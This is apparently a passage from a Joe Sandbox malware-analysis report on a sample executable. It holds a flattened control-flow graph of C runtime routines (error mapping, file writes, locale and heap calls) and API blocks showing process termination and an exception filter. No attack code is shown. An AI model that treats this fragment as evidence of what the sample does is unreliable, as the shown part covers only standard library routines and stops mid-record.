6049->6072 6051 106a3c __dosmaperr 6 API calls 6050->6051 6051->6049 6053 1041f8 6052->6053 6054 1045de __dosmaperr 14 API calls 6053->6054 6053->6072 6057 104208 6054->6057 6058 104210 6057->6058 6059 104225 6057->6059 6062 106a7b __dosmaperr 6 API calls 6058->6062 6061 106a7b __dosmaperr 6 API calls 6059->6061 6060 10425d 6073 1053ae 6060->6073 6063 104231 6061->6063 6064 10421c 6062->6064 6065 104244 6063->6065 6066 104235 6063->6066 6069 10463b _free 14 API calls 6064->6069 6068 103f3e __dosmaperr 14 API calls 6065->6068 6067 106a7b __dosmaperr 6 API calls 6066->6067 6067->6064 6070 10424f 6068->6070 6069->6072 6071 10463b _free 14 API calls 6070->6071 6071->6072 6072->6060 6092 103c45 6072->6092 6402 1054c2 6073->6402 6078 1053da 6078->6044 6082 10463b _free 14 API calls 6084 10542b 6082->6084 6083 105410 6085 105418 6083->6085 6088 105433 6083->6088 6084->6044 6086 1045cb __dosmaperr 14 API calls 6085->6086 6091 10541d 6086->6091 6087 10545f 6087->6091 6436 10504a 6087->6436 6088->6087 6089 10463b _free 14 API calls 6088->6089 6089->6087 6091->6082 6103 106e7e 6092->6103 6096 103c5f IsProcessorFeaturePresent 6098 103c6b 6096->6098 6097 103c55 6097->6096 6102 103c7e 6097->6102 6100 104362 __fassign UnhandledExceptionFilter 6098->6100 6099 1034b1 __fassign 23 API calls 6101 103c88 6099->6101 6100->6102 6102->6099 6139 106db0 6103->6139 6106 106ec3 6107 106ecf ___scrt_is_nonwritable_in_current_image 6106->6107 6108 104267 __dosmaperr 14 API calls 6107->6108 6112 106efc __fassign 6107->6112 6113 106ef6 __fassign 6107->6113 6108->6113 6109 106f43 6110 1045cb __dosmaperr 14 API calls 6109->6110 6111 106f48 6110->6111 6114 10450e __fassign 18 API calls 6111->6114 6115 106f6f 6112->6115 6150 105ae8 EnterCriticalSection 6112->6150 6113->6109 6113->6112 6133 106f2d 6113->6133 6114->6133 6118 106fb1 6115->6118 6119 1070a2 6115->6119 6129 106fe0 6115->6129 6118->6129 6151 104110 GetLastError 6118->6151 6121 1070ad 6119->6121 6182 105b30 LeaveCriticalSection 6119->6182 6123 1034b1 __fassign 23 API calls 6121->6123 6128 1070b5 ___scrt_is_nonwritable_in_current_image 6123->6128 6125 104110 __fassign 59 API calls 6131 107035 6125->6131 6127 104110 __fassign 59 API calls 6127->6129 6183 10745d EnterCriticalSection 6128->6183 6178 10704f 6129->6178 6132 104110 __fassign 59 API calls 6131->6132 6131->6133 6132->6133 6133->6097 6134 1070cc ___scrt_uninitialize_crt 6135 107105 6134->6135 6184 1072f8 6134->6184 6194 107136 6135->6194 6140 106dbc ___scrt_is_nonwritable_in_current_image 6139->6140 6145 105ae8 EnterCriticalSection 6140->6145 6142 106dca 6146 106e08 6142->6146 6145->6142 6149 105b30 LeaveCriticalSection 6146->6149 6148 103c4a 6148->6097 6148->6106 6149->6148 6150->6115 6152 10412d 6151->6152 6153 104127 6151->6153 6155 106a7b __dosmaperr 6 API calls 6152->6155 6176 104133 SetLastError 6152->6176 6154 106a3c __dosmaperr 6 API calls 6153->6154 6154->6152 6156 10414b 6155->6156 6157 1045de __dosmaperr 14 API calls 6156->6157 6156->6176 6158 10415b 6157->6158 6160 104163 6158->6160 6161 10417a 6158->6161 6164 106a7b __dosmaperr 6 API calls 6160->6164 6166 106a7b __dosmaperr 6 API calls 6161->6166 6162 1041c1 6162->6127 6163 1041c7 6165 103c45 __fassign 57 API calls 6163->6165 6167 104171 6164->6167 6168 1041cc 6165->6168 6169 104186 6166->6169 6172 10463b _free 14 API calls 6167->6172 6170 10418a 6169->6170 6171 10419b 6169->6171 6173 106a7b __dosmaperr 6 API calls 6170->6173 6174 103f3e __dosmaperr 14 API calls 6171->6174 6172->6176 6173->6167 6175 1041a6 6174->6175 6177 10463b _free 14 API calls 6175->6177 6176->6162 6176->6163 6177->6176 6179 107055 6178->6179 6180 107026 6178->6180 6197 105b30 LeaveCriticalSection 6179->6197 6180->6125 6180->6131 6180->6133 6182->6121 6183->6134 6185 107305 6184->6185 6186 10730e 6184->6186 6198 1071ee 6185->6198 6201 107293 6186->6201 6189 10730b 6189->6135 6192 10732a 6214 10858f 6192->6214 6401 107471 LeaveCriticalSection 6194->6401 6196 107124 6196->6097 6197->6180 6225 107142 6198->6225 6202 1072ab 6201->6202 6206 1072d0 6201->6206 6203 107a81 ___scrt_uninitialize_crt 18 API calls 6202->6203 6202->6206 6204 1072c9 6203->6204 6247 108d87 6204->6247 6206->6189 6207 107a81 6206->6207 6208 107aa2 6207->6208 6209 107a8d 6207->6209 6208->6192 6210 1045cb __dosmaperr 14 API calls 6209->6210 6211 107a92 6210->6211 6212 10450e __fassign 18 API calls 6211->6212 6213 107a9d 6212->6213 6213->6192 6215 1085a0 6214->6215 6216 1085ad 6214->6216 6217 1045cb __dosmaperr 14 API calls 6215->6217 6218 1085f6 6216->6218 6220 1085d4 6216->6220 6224 1085a5 6217->6224 6219 1045cb __dosmaperr 14 API calls 6218->6219 6221 1085fb 6219->6221 6369 1084ed 6220->6369 6223 10450e __fassign 18 API calls 6221->6223 6223->6224 6224->6189 6226 10714e ___scrt_is_nonwritable_in_current_image 6225->6226 6233 105ae8 EnterCriticalSection 6226->6233 6228 107158 ___scrt_uninitialize_crt 6229 1071c4 6228->6229 6234 1070b6 6228->6234 6242 1071e2 6229->6242 6233->6228 6235 1070c2 ___scrt_is_nonwritable_in_current_image 6234->6235 6245 10745d EnterCriticalSection 6235->6245 6237 1070cc ___scrt_uninitialize_crt 6239 1072f8 ___scrt_uninitialize_crt 59 API calls 6237->6239 6241 107105 6237->6241 6238 107136 ___scrt_uninitialize_crt LeaveCriticalSection 6240 107124 6238->6240 6239->6241 6240->6228 6241->6238 6246 105b30 LeaveCriticalSection 6242->6246 6244 1071d0 6244->6189 6245->6237 6246->6244 6248 108d93 ___scrt_is_nonwritable_in_current_image 6247->6248 6249 108db3 6248->6249 6250 108d9b 6248->6250 6251 108e4e 6249->6251 6255 108de5 6249->6255 6272 1045b8 6250->6272 6253 1045b8 __dosmaperr 14 API calls 6251->6253 6256 108e53 6253->6256 6275 105cc6 EnterCriticalSection 6255->6275 6260 1045cb __dosmaperr 14 API calls 6256->6260 6257 1045cb __dosmaperr 14 API calls 6258 108da8 6257->6258 6258->6206 6262 108e5b 6260->6262 6261 108deb 6263 108e07 6261->6263 6264 108e1c 6261->6264 6265 10450e __fassign 18 API calls 6262->6265 6266 1045cb __dosmaperr 14 API calls 6263->6266 6276 108e79 6264->6276 6265->6258 6268 108e0c 6266->6268 6270 1045b8 __dosmaperr 14 API calls 6268->6270 6269 108e17 6318 108e46 6269->6318 6270->6269 6273 104267 __dosmaperr 14 API calls 6272->6273 6274 1045bd 6273->6274 6274->6257 6275->6261 6277 108e9b 6276->6277 6278 108eb7 6276->6278 6279 108e9f 6277->6279 6281 108eef 6277->6281 6278->6269 6280 1045b8 __dosmaperr 14 API calls 6279->6280 6282 108ea4 6280->6282 6283 108f05 6281->6283 6321 109510 6281->6321 6284 1045cb __dosmaperr 14 API calls 6282->6284 6324 108a20 6283->6324 6287 108eac 6284->6287 6289 10450e __fassign 18 API calls 6287->6289 6289->6278 6290 108f13 6294 108f17 6290->6294 6295 108f39 6290->6295 6291 108f4c 6292 108f60 6291->6292 6293 108fa6 WriteFile 6291->6293 6296 108f96 6292->6296 6297 108f68 6292->6297 6299 108fc9 GetLastError 6293->6299 6301 108f2f 6293->6301 6298 109013 6294->6298 6331 1089b8 6294->6331 6336 10860c GetConsoleOutputCP 6295->6336 6358 108a91 6296->6358 6302 108f86 6297->6302 6303 108f6d 6297->6303 6298->6278 6306 1045cb __dosmaperr 14 API calls 6298->6306 6299->6301 6301->6278 6301->6298 6309 108fe9 6301->6309 6352 108c55 6302->6352 6303->6298 6347 108b6c 6303->6347 6308 109034 6306->6308 6311 1045b8 __dosmaperr 14 API calls 6308->6311 6312 108ff0 6309->6312 6313 109007 6309->6313 6311->6278 6314 1045cb __dosmaperr 14 API calls 6312->6314 6363 104595 6313->6363 6316 108ff5 6314->6316 6317 1045b8 __dosmaperr 14 API calls 6316->6317 6317->6278 6368 105ce9 LeaveCriticalSection 6318->6368 6320 108e4c 6320->6258 6322 109494 ___scrt_uninitialize_crt 20 API calls 6321->6322 6323 109526 6322->6323 6323->6283 6325 10913e ___scrt_uninitialize_crt 18 API calls 6324->6325 6326 108a31 6325->6326 6327 104110 __fassign 58 API calls 6326->6327 6330 108a87 6326->6330 6328 108a54 6327->6328 6329 108a6e GetConsoleMode 6328->6329 6328->6330 6329->6330 6330->6290 6330->6291 6332 1089da 6331->6332 6335 108a0f 6331->6335 6333 10952b 5 API calls ___scrt_uninitialize_crt 6332->6333 6334 108a11 GetLastError 6332->6334 6332->6335 6333->6332 6334->6335 6335->6301 6337 103c94 __fassign 55 API calls 6336->6337 6344 108668 ___scrt_uninitialize_crt 6337->6344 6338 106298 ___scrt_uninitialize_crt 55 API calls 6338->6344 6339 107a0d 55 API calls __fassign 6339->6344 6340 10890e _ValidateLocalCookies 6340->6301 6341 105935 ___scrt_uninitialize_crt WideCharToMultiByte 6341->6344 6342 108891 WriteFile 6343 108986 GetLastError 6342->6343 6342->6344 6343->6340 6344->6338 6344->6339 6344->6340 6344->6341 6344->6342 6345 10935e 14 API calls ___scrt_uninitialize_crt 6344->6345 6346 1088c9 WriteFile 6344->6346 6345->6344 6346->6343 6346->6344 6349 108b7b ___scrt_uninitialize_crt 6347->6349 6348 108bf0 WriteFile 6348->6349 6350 108c3c GetLastError 6348->6350 6349->6348 6351 108c3a _ValidateLocalCookies 6349->6351 6350->6351 6351->6301 6357 108c64 ___scrt_uninitialize_crt 6352->6357 6353 108d6c _ValidateLocalCookies 6353->6301 6354 105935 ___scrt_uninitialize_crt WideCharToMultiByte 6354->6357 6355 108d6e GetLastError 6355->6353 6356 108d23 WriteFile 6356->6355 6356->6357 6357->6353 6357->6354 6357->6355 6357->6356 6359 108aa0 ___scrt_uninitialize_crt 6358->6359 6360 108b51 _ValidateLocalCookies 6359->6360 6361 108b10 WriteFile 6359->6361 6360->6301 6361->6359 6362 108b53 GetLastError 6361->6362 6362->6360 6364 1045b8 __dosmaperr 14 API calls 6363->6364 6365 1045a0 __dosmaperr 6364->6365 6366 1045cb __dosmaperr 14 API calls 6365->6366 6367 1045b3 6366->6367 6367->6278 6368->6320 6370 1084f9 ___scrt_is_nonwritable_in_current_image 6369->6370 6383 105cc6 EnterCriticalSection 6370->6383 6372 108508 6373 10854f 6372->6373 6384 105d9d 6372->6384 6375 1045cb __dosmaperr 14 API calls 6373->6375 6376 108554 6375->6376 6397 108583 6376->6397 6377 108534 FlushFileBuffers 6377->6376 6378 108540 6377->6378 6380 1045b8 __dosmaperr 14 API calls 6378->6380 6382 108545 GetLastError 6380->6382 6382->6373 6383->6372 6385 105daa 6384->6385 6386 105dbf 6384->6386 6387 1045b8 __dosmaperr 14 API calls 6385->6387 6389 1045b8 __dosmaperr 14 API calls 6386->6389 6392 105de4 6386->6392 6388 105daf 6387->6388 6391 1045cb __dosmaperr 14 API calls 6388->6391 6390 105def 6389->6390 6393 1045cb __dosmaperr 14 API calls 6390->6393 6394 105db7 6391->6394 6392->6377 6395 105df7 6393->6395 6394->6377 6396 10450e __fassign 18 API calls 6395->6396 6396->6394 6400 105ce9 LeaveCriticalSection 6397->6400 6399 10856c 6399->6224 6400->6399 6401->6196 6403 1054ce ___scrt_is_nonwritable_in_current_image 6402->6403 6410 1054e8 6403->6410 6444 105ae8 EnterCriticalSection 6403->6444 6406 103c45 __fassign 59 API calls 6411 105561 6406->6411 6407 1053c1 6413 105158 6407->6413 6408 105524 6445 105541 6408->6445 6409 1054f8 6409->6408 6412 10463b _free 14 API calls 6409->6412 6410->6406 6410->6407 6412->6408 6449 103c94 6413->6449 6416 105179 GetOEMCP 6418 1051a2 6416->6418 6417 10518b 6417->6418 6419 105190 GetACP 6417->6419 6418->6078 6420 1062bc 6418->6420 6419->6418 6421 1062fa 6420->6421 6422 1062ca __dosmaperr 6420->6422 6423 1045cb __dosmaperr 14 API calls 6421->6423 6422->6421 6424 1062e5 RtlAllocateHeap 6422->6424 6426 106d27 __dosmaperr 2 API calls 6422->6426 6425 1053eb 6423->6425 6424->6422 6424->6425 6425->6091 6427 1055bd 6425->6427 6426->6422 6428 105158 61 API calls 6427->6428 6429 1055dd 6428->6429 6430 105653 __fassign _ValidateLocalCookies 6429->6430 6431 105617 IsValidCodePage 6429->6431 6430->6083 6431->6430 6432 105629 6431->6432 6433 105658 GetCPInfo 6432->6433 6435 105632 __fassign 6432->6435 6433->6430 6433->6435 6492 10522e 6435->6492 6437 105056 ___scrt_is_nonwritable_in_current_image 6436->6437 6570 105ae8 EnterCriticalSection 6437->6570 6439 105060 6571 105097 6439->6571 6444->6409 6448 105b30 LeaveCriticalSection 6445->6448 6447 105548 6447->6410 6448->6447 6450 103cab 6449->6450 6451 103cb4 6449->6451 6450->6416 6450->6417 6451->6450 6452 104110 __fassign 59 API calls 6451->6452 6453 103cd4 6452->6453 6457 107a27 6453->6457 6458 103cea 6457->6458 6459 107a3a 6457->6459 6461 107a54 6458->6461 6459->6458 6465 1066f6 6459->6465 6462 107a67 6461->6462 6464 107a7c 6461->6464 6462->6464 6487 1055aa 6462->6487 6464->6450 6466 106702 ___scrt_is_nonwritable_in_current_image 6465->6466 6467 104110 __fassign 59 API calls 6466->6467 6468 10670b 6467->6468 6475 106751 6468->6475 6478 105ae8 EnterCriticalSection 6468->6478 6470 106729 6479 106777 6470->6479 6475->6458 6476 103c45 __fassign 59 API calls 6477 106776 6476->6477 6478->6470 6480 10673a 6479->6480 6481 106785 __fassign 6479->6481 6483 106756 6480->6483 6481->6480 6482 1064aa __fassign 14 API calls 6481->6482 6482->6480 6486 105b30 LeaveCriticalSection 6483->6486 6485 10674d 6485->6475 6485->6476 6486->6485 6488 104110 __fassign 59 API calls 6487->6488 6489 1055b4 6488->6489 6490 1054c2 __fassign 59 API calls 6489->6490 6491 1055ba 6490->6491 6491->6464 6493 105256 GetCPInfo 6492->6493 6495 10531f _ValidateLocalCookies 6492->6495 6494 10526e 6493->6494 6493->6495 6501 10630a 6494->6501 6495->6430 6497 1052d6 6514 10832e 6497->6514 6500 10832e 61 API calls 6500->6495 6502 103c94 __fassign 59 API calls 6501->6502 6503 10632a 6502->6503 6519 1058b9 6503->6519 6505 106357 6506 1062bc 15 API calls 6505->6506 6507 1063e8 _ValidateLocalCookies 6505->6507 6510 10637d __fassign 6505->6510 6506->6510 6507->6497 6508 1063e2 6522 10640d 6508->6522 6510->6508 6511 1058b9 __fassign MultiByteToWideChar 6510->6511 6512 1063cb 6511->6512 6512->6508 6513 1063d2 GetStringTypeW 6512->6513 6513->6508 6515 103c94 __fassign 59 API calls 6514->6515 6516 108341 6515->6516 6526 108144 6516->6526 6518 1052f7 6518->6500 6520 1058ca MultiByteToWideChar 6519->6520 6520->6505 6523 106419 6522->6523 6524 10642a 6522->6524 6523->6524 6525 10463b _free 14 API calls 6523->6525 6524->6507 6525->6524 6527 10815f 6526->6527 6528 1058b9 __fassign MultiByteToWideChar 6527->6528 6530 1081a3 6528->6530 6529 108308 _ValidateLocalCookies 6529->6518 6530->6529 6531 1062bc 15 API calls 6530->6531 6534 1081c8 6530->6534 6531->6534 6532 10826d 6536 10640d __freea 14 API calls 6532->6536 6533 1058b9 __fassign MultiByteToWideChar 6535 10820e 6533->6535 6534->6532 6534->6533 6535->6532 6552 106b08 6535->6552 6536->6529 6539 108244 6539->6532 6542 106b08 6 API calls 6539->6542 6540 10827c 6543 1062bc 15 API calls 6540->6543 6546 10828e 6540->6546 6541 1082f9 6545 10640d __freea 14 API calls 6541->6545 6542->6532 6543->6546 6544 106b08 6 API calls 6547 1082d6 6544->6547 6545->6532 6546->6541 6546->6544 6547->6541 6558 105935 6547->6558 6549 1082f0 6549->6541 6550 108325 6549->6550 6551 10640d __freea 14 API calls 6550->6551 6551->6532 6561 1067e1 6552->6561 6556 106b59 LCMapStringW 6557 106b19 6556->6557 6557->6532 6557->6539 6557->6540 6560 10594c WideCharToMultiByte 6558->6560 6560->6549 6562 1068dc __dosmaperr 5 API calls 6561->6562 6563 1067f7 6562->6563 6563->6557 6564 106b65 6563->6564 6567 1067fb 6564->6567 6566 106b70 6566->6556 6568 1068dc __dosmaperr 5 API calls 6567->6568 6569 106811 6568->6569 6569->6566 6570->6439 6581 1057b0 6571->6581 6573 1050b9 6574 1057b0 18 API calls 6573->6574 6575 1050d8 6574->6575 6576 10506d 6575->6576 6577 10463b _free 14 API calls 6575->6577 6578 10508b 6576->6578 6577->6576 6595 105b30 LeaveCriticalSection 6578->6595 6580 105079 6580->6091 6582 1057c1 6581->6582 6590 1057bd ___scrt_uninitialize_crt 6581->6590 6583 1057c8 6582->6583 6586 1057db __fassign 6582->6586 6584 1045cb __dosmaperr 14 API calls 6583->6584 6585 1057cd 6584->6585 6587 10450e __fassign 18 API calls 6585->6587 6588 105812 6586->6588 6589 105809 6586->6589 6586->6590 6587->6590 6588->6590 6593 1045cb __dosmaperr 14 API calls 6588->6593 6591 1045cb __dosmaperr 14 API calls 6589->6591 6590->6573 6592 10580e 6591->6592 6594 10450e __fassign 18 API calls 6592->6594 6593->6592 6594->6590 6595->6580 6597 103c94 __fassign 59 API calls 6596->6597 6598 105845 6597->6598 6598->5937 6600 103399 6599->6600 6601 1033ab 6599->6601 6602 101846 __fassign GetModuleHandleW 6600->6602 6611 103251 6601->6611 6604 10339e 6602->6604 6604->6601 6627 103431 GetModuleHandleExW 6604->6627 6606 101256 6606->5964 6610 1033ee 6612 10325d ___scrt_is_nonwritable_in_current_image 6611->6612 6633 105ae8 EnterCriticalSection 6612->6633 6614 103267 6634 10329e 6614->6634 6616 103274 6638 103292 6616->6638 6619 1033ef 6662 105b47 GetPEB 6619->6662 6622 10341e 6625 103431 __fassign 3 API calls 6622->6625 6623 1033fe GetPEB 6623->6622 6624 10340e GetCurrentProcess TerminateProcess 6623->6624 6624->6622 6626 103426 ExitProcess 6625->6626 6628 103450 GetProcAddress 6627->6628 6629 103473 6627->6629 6632 103465 6628->6632 6630 1033aa 6629->6630 6631 103479 FreeLibrary 6629->6631 6630->6601 6631->6630 6632->6629 6633->6614 6635 1032aa ___scrt_is_nonwritable_in_current_image 6634->6635 6636 10330b __fassign 6635->6636 6641 10396f 6635->6641 6636->6616 6661 105b30 LeaveCriticalSection 6638->6661 6640 103280 6640->6606 6640->6619 6644 1036a0 6641->6644 6645 1036ac ___scrt_is_nonwritable_in_current_image 6644->6645 6652 105ae8 EnterCriticalSection 6645->6652 6647 1036ba 6653 10387f 6647->6653 6652->6647 6654 1036c7 6653->6654 6655 10389e 6653->6655 6657 1036ef 6654->6657 6655->6654 6656 10463b _free 14 API calls 6655->6656 6656->6654 6660 105b30 LeaveCriticalSection 6657->6660 6659 1036d8 6659->6636 6660->6659 6661->6640 6663 1033f9 6662->6663 6664 105b61 6662->6664 6663->6622 6663->6623 6666 10695f 6664->6666 6667 1068dc __dosmaperr 5 API calls 6666->6667 6668 10697b 6667->6668 6668->6663 6670 103b22 ___scrt_uninitialize_crt 6669->6670 6671 103b10 6669->6671 6670->5958 6672 103b1e 6671->6672 6674 107340 6671->6674 6672->5958 6675 1071ee ___scrt_uninitialize_crt 59 API calls 6674->6675 6676 107347 6675->6676 6676->6672 7312 106c64 GetProcessHeap 6677 102fa6 6678 105562 67 API calls 6677->6678 6679 102fb1 6678->6679 6688 105a23 GetEnvironmentStringsW 6679->6688 6682 102fbc 6685 10463b _free 14 API calls 6682->6685 6686 102feb 6685->6686 6687 10463b _free 14 API calls 6687->6682 6689 105a90 6688->6689 6690 105a3a 6688->6690 6691 102fb6 6689->6691 6692 105a99 FreeEnvironmentStringsW 6689->6692 6693 105935 ___scrt_uninitialize_crt WideCharToMultiByte 6690->6693 6691->6682 6700 102ff1 6691->6700 6692->6691 6694 105a53 6693->6694 6694->6689 6695 1062bc 15 API calls 6694->6695 6696 105a63 6695->6696 6697 105a7b 6696->6697 6698 105935 ___scrt_uninitialize_crt WideCharToMultiByte 6696->6698 6699 10463b _free 14 API calls 6697->6699 6698->6697 6699->6689 6701 103006 6700->6701 6702 1045de __dosmaperr 14 API calls 6701->6702 6710 10302d 6702->6710 6703 103092 6704 10463b _free 14 API calls 6703->6704 6705 102fc7 6704->6705 6705->6687 6706 1045de __dosmaperr 14 API calls 6706->6710 6707 103094 6726 1030c1 6707->6726 6710->6703 6710->6706 6710->6707 6712 1030b4 6710->6712 6715 10463b _free 14 API calls 6710->6715 6717 103beb 6710->6717 6714 10451e __fassign 4 API calls 6712->6714 6713 10463b _free 14 API calls 6713->6703 6716 1030c0 6714->6716 6715->6710 6718 103bf8 6717->6718 6719 103c06 6717->6719 6718->6719 6722 103c1d 6718->6722 6720 1045cb __dosmaperr 14 API calls 6719->6720 6725 103c0e 6720->6725 6721 10450e __fassign 18 API calls 6723 103c18 6721->6723 6722->6723 6724 1045cb __dosmaperr 14 API calls 6722->6724 6723->6710 6724->6725 6725->6721 6727 1030ce 6726->6727 6731 10309a 6726->6731 6728 1030e5 6727->6728 6729 10463b _free 14 API calls 6727->6729 6730 10463b _free 14 API calls 6728->6730 6729->6727 6730->6731 6731->6713 7313 102167 7314 102171 7313->7314 7315 10217e 7313->7315 7314->7315 7317 103bd0 7314->7317 7318 10463b _free 14 API calls 7317->7318 7319 103be8 7318->7319 7319->7315 7534 105aa7 7535 105ab2 7534->7535 7536 106abd 6 API calls 7535->7536 7537 105adb 7535->7537 7538 105ad7 7535->7538 7536->7535 7540 105aff 7537->7540 7541 105b2b 7540->7541 7542 105b0c 7540->7542 7541->7538 7543 105b16 DeleteCriticalSection 7542->7543 7543->7541 7543->7543 7632 105fe9 7633 105fee 7632->7633 7635 106011 7633->7635 7636 105bf3 7633->7636 7637 105c00 7636->7637 7641 105c22 7636->7641 7638 105c1c 7637->7638 7639 105c0e DeleteCriticalSection 7637->7639 7640 10463b _free 14 API calls 7638->7640 7639->7638 7639->7639 7640->7641 7641->7633 7121 10482b 7122 10483b 7121->7122 7123 10484f 7121->7123 7124 1045cb __dosmaperr 14 API calls 7122->7124 7132 1048c6 7123->7132 7136 10493f 7123->7136 7142 104a1a 7123->7142 7125 104840 7124->7125 7126 10450e __fassign 18 API calls 7125->7126 7137 10484a 7126->7137 7129 104934 7130 10463b _free 14 API calls 7129->7130 7130->7136 7131 10492b 7131->7129 7131->7131 7138 104a0f 7131->7138 7166 108051 7131->7166 7160 102f44 7132->7160 7134 1049fb 7135 10463b _free 14 API calls 7134->7135 7135->7137 7136->7134 7139 10463b _free 14 API calls 7136->7139 7140 10451e __fassign 4 API calls 7138->7140 7139->7136 7141 104a19 7140->7141 7143 104a26 7142->7143 7143->7143 7144 1045de __dosmaperr 14 API calls 7143->7144 7145 104a54 7144->7145 7146 108051 18 API calls 7145->7146 7147 104a80 7146->7147 7148 10451e __fassign 4 API calls 7147->7148 7149 104aca 7148->7149 7175 104d22 7149->7175 7154 104be0 7155 104d22 59 API calls 7154->7155 7156 104c1d 7155->7156 7183 10473f 7156->7183 7159 104a1a 63 API calls 7161 102f55 7160->7161 7162 102f87 7160->7162 7161->7162 7163 1045de __dosmaperr 14 API calls 7161->7163 7162->7131 7164 102f7e 7163->7164 7165 10463b _free 14 API calls 7164->7165 7165->7162 7168 107f9e 7166->7168 7167 107fb6 7169 107fca 7167->7169 7170 1045cb __dosmaperr 14 API calls 7167->7170 7168->7167 7168->7169 7173 107fee 7168->7173 7169->7131 7171 107fc0 7170->7171 7172 10450e __fassign 18 API calls 7171->7172 7172->7169 7173->7169 7174 1045cb __dosmaperr 14 API calls 7173->7174 7174->7171 7176 103c94 __fassign 59 API calls 7175->7176 7177 104d34 7176->7177 7179 104b92 7177->7179 7206 10699f 7177->7206 7180 10480e 7179->7180 7212 10468d 7180->7212 7184 104769 7183->7184 7185 10474d 7183->7185 7187 104790 7184->7187 7188 104770 7184->7188 7186 104d61 14 API calls 7185->7186 7194 104757 7186->7194 7189 105935 ___scrt_uninitialize_crt WideCharToMultiByte 7187->7189 7188->7194 7242 104d7b 7188->7242 7190 1047a0 7189->7190 7192 1047a7 GetLastError 7190->7192 7193 1047bd 7190->7193 7195 104595 __dosmaperr 14 API calls 7192->7195 7196 1047ce 7193->7196 7198 104d7b 15 API calls 7193->7198 7194->7159 7197 1047b3 7195->7197 7196->7194 7199 105935 ___scrt_uninitialize_crt WideCharToMultiByte 7196->7199 7200 1045cb __dosmaperr 14 API calls 7197->7200 7198->7196 7201 1047e6 7199->7201 7200->7194 7201->7194 7202 1047ed GetLastError 7201->7202 7203 104595 __dosmaperr 14 API calls 7202->7203 7204 1047f9 7203->7204 7205 1045cb __dosmaperr 14 API calls 7204->7205 7205->7194 7209 1067c7 7206->7209 7210 1068dc __dosmaperr 5 API calls 7209->7210 7211 1067dd 7210->7211 7211->7179 7213 1046b5 7212->7213 7214 10469b 7212->7214 7215 1046db 7213->7215 7216 1046bc 7213->7216 7230 104d61 7214->7230 7218 1058b9 __fassign MultiByteToWideChar 7215->7218 7229 1046a5 FindFirstFileExW 7216->7229 7234 104db7 7216->7234 7220 1046ea 7218->7220 7221 1046f1 GetLastError 7220->7221 7222 104717 7220->7222 7224 104db7 15 API calls 7220->7224 7223 104595 __dosmaperr 14 API calls 7221->7223 7225 1058b9 __fassign MultiByteToWideChar 7222->7225 7222->7229 7226 1046fd 7223->7226 7224->7222 7227 10472e 7225->7227 7228 1045cb __dosmaperr 14 API calls 7226->7228 7227->7221 7227->7229 7228->7229 7229->7154 7231 104d74 7230->7231 7232 104d6c 7230->7232 7231->7229 7233 10463b _free 14 API calls 7232->7233 7233->7231 7235 104d61 14 API calls 7234->7235 7236 104dc5 7235->7236 7239 104df6 7236->7239 7240 1062bc 15 API calls 7239->7240 7241 104dd6 7240->7241 7241->7229 7243 104d61 14 API calls 7242->7243 7244 104d89 7243->7244 7245 104df6 15 API calls 7244->7245 7246 104d97 7245->7246 7246->7194 7247 109d2b IsProcessorFeaturePresent 7320 10336f 7323 103b94 7320->7323 7324 103ba0 ___scrt_is_nonwritable_in_current_image 7323->7324 7325 104110 __fassign 59 API calls 7324->7325 7328 103ba5 7325->7328 7326 103c45 __fassign 59 API calls 7327 103bcf 7326->7327 7328->7326

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,001033EE,?,?,?,?,?,00108F0E), ref: 00103411
                                          • TerminateProcess.KERNEL32(00000000,?,001033EE,?,?,?,?,?,00108F0E), ref: 00103418
                                          • ExitProcess.KERNEL32 ref: 0010342A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 052c78deed26928714516b35ee275cc3bb0e0d665ec687f186f800347b271a5d
                                          • Instruction ID: aa162e06b481156fccc2cf5297f2480de7c039527bc6eaab19887daf9bdb70b0
                                          • Opcode Fuzzy Hash: 052c78deed26928714516b35ee275cc3bb0e0d665ec687f186f800347b271a5d
                                          • Instruction Fuzzy Hash: D2E04635000548EBCB226B64CD08A097B2EEB40381B008424F994CA971CBB5EEC2DE80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 67 101889-101894
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00001895,001010D6), ref: 0010188E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
                                          • Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID: Pdhv
                                          • API String ID: 3192549508-2983560932
                                          • Opcode ID: 14835ed0ade8e428eb6bc9bab27f0d2bc55fc37df4caab215d23baa67ea67af2
                                          • Instruction ID: 4f973a1f12f043512906486a292cada798f920a4db72444f661ab343bbb03606
                                          • Opcode Fuzzy Hash: 14835ed0ade8e428eb6bc9bab27f0d2bc55fc37df4caab215d23baa67ea67af2
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true
